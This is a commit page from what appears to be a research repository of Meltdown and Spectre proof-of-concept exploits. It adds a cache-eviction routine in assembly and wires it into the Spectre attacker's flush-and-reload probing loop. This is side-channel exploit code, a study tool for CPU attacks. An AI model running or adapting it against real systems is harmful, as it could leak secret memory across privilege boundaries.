Introduce Evict

msmania · Mar 11, 2018 · 97982a1 · 97982a1
1 parent baf9408
commit 97982a1
Show file tree

Hide file tree

Showing 3 changed files with 20 additions and 3 deletions.
diff --git a/03_meltdown_full/Makefile b/03_meltdown_full/Makefile
@@ -72,7 +72,7 @@ $(OUTDIR)\$(CONTROLLER): $(OBJS_CONTROLLER)
 
 $(OUTDIR)\$(DRIVER): $(OBJS_DRIVER)
 	@if not exist $(OUTDIR) mkdir $(OUTDIR)
-	$(LINKER) $(LFLAGS_DRIVER) $(LIBS_DRIVER) /PDB:"$(@R).pdb" /IMPLIB:"$(@R).lib" /OUT:$@ $**
+	$(LINKER) $(LFLAGS_DRIVER) $(LIBS_DRIVER) /PDB:"$(@R)_driver.pdb" /IMPLIB:"$(@R).lib" /OUT:$@ $**
 	$(SIGNTOOL) sign /ph /sha1 $(CODESIGN_SHA1) $@
 
 {attacker}.cpp{attacker\$(OBJDIR)}.obj:

diff --git a/04_spectre_full/attacker/01.asm b/04_spectre_full/attacker/01.asm
@@ -1,5 +1,6 @@
 global memory_access
 global flush_reload
+global evict
 
 section .text
 
@@ -37,3 +38,10 @@ flush_reload:
   sub rax,r8
   clflush [r9]
   ret
+
+evict:
+  mov al, byte [rcx]
+  add rcx, r8
+  dec edx
+  jnz evict
+  ret
diff --git a/04_spectre_full/attacker/main.cpp b/04_spectre_full/attacker/main.cpp
@@ -12,12 +12,14 @@ extern "C" {
 
   uint32_t memory_access(LPCBYTE);
   uint32_t flush_reload(LPCBYTE);
+  void evict(void *start, int count, int step);
 }
 
 const char TheAnswer[] = "Answer to the Ultimate Question of Life, The Universe, and Everything is 42";
 constexpr int probe_lines = 256;
 DWORD_PTR tat[probe_lines];
 uint8_t *probe = nullptr;
+uint8_t junk[10 * 1024 * 4096];
 
 auto gadget_module = GetModuleHandle(L"gadget.dll");
 void (*Touch)(uint8_t*, uint8_t*) = nullptr;
@@ -56,20 +58,27 @@ void victim_thread(const void *target, bool do_probe) {
 
   for (;;) {
     for (int trial = 0; trial < 20000; ++trial) {
+      Sleep(10);
       if (do_probe) {
+#if 0
         for (int i = 0; i < probe_lines; ++i)
           _mm_clflush(&probe[i * 4096]);
+#else
+        evict(junk, 10 * 1024, 2048);
+#endif
       }
       else {
+#if 1
         // This is strange.  For some reason, flushing the probe on the victim side
         // helps getting repro.  Need to find a way to get rid of this hack later.
         for (int i = 0; i < probe_lines; ++i)
           _mm_clflush(&probe[i * 4096]);
+#else
+        evict(junk, 10 * 1024, 2048);
+#endif
       }
 
-      Sleep(100);
       IndirectCall(call_destination, target, probe);
-
       if (!do_probe) continue;
 
       for (int i = 0; i < probe_lines; ++i)